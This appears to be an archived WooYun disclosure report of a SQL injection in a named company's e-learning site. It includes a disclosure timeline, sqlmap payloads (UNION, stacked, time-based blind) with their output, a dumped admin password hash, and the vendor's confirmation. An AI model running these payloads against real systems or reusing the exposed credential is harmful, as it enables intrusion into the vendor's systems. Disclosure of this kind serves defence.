WooYun (WooYun.org) historical vulnerability search: http://wy.zone.ci/
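2015-03-24: Details reported to the vendor; awaiting vendor handling
2015-03-25: Vendor confirmed; details disclosed to the vendor only
2015-04-04: Details disclosed to core white hats and experts in related fields
2015-04-14: Details disclosed to regular white hats
2015-04-24: Details disclosed to intern white hats
2015-05-09: Details disclosed to the public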
Fly
Injection point: http://elearning.corp.elong.com/Showknowledge.aspx?id=214 (a delay of 10 s or more is required, otherwise it errors out)
--dbs --time-sec 10
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=212 AND 8115=8115

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: id=-3129 UNION ALL SELECT NULL, NULL, CHAR(58)+CHAR(113)+CHAR(112)+CHAR(121)+CHAR(58)+CHAR(66)+CHAR(103)+CHAR(111)+CHAR(83)+CHAR(119)+CHAR(113)+CHAR(85)+CHAR(113)+CHAR(109)+CHAR(102)+CHAR(58)+CHAR(114)+CHAR(104)+CHAR(114)+CHAR(58), NULL, NULL--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=212; WAITFOR DELAY '0:0:10';--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=212 WAITFOR DELAY '0:0:10'--
---
Database: elonglearning
[204 tables]

Database: elonglearning
Table: dbo.vadmin
[1 entry]
+---------+-----------+----------------------------------+
| adminid | psysadmin | adminpass                        |
+---------+-----------+----------------------------------+
| admin   | <blank>   | 0146636BB87967E6A4DC4B80BE9E610F |
+---------+-----------+----------------------------------+

Although the password was dumped, nothing I tried with it worked. If one could log in to the admin backend, FCK would still be easy to deal with.
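Fix the SQL injection.
Severity: Medium
Vulnerability Rank: 10
Confirmed at: 2015-03-25 11:03
Thanks to the white hat for the reminder; we will fix it as soon as possible.
None yet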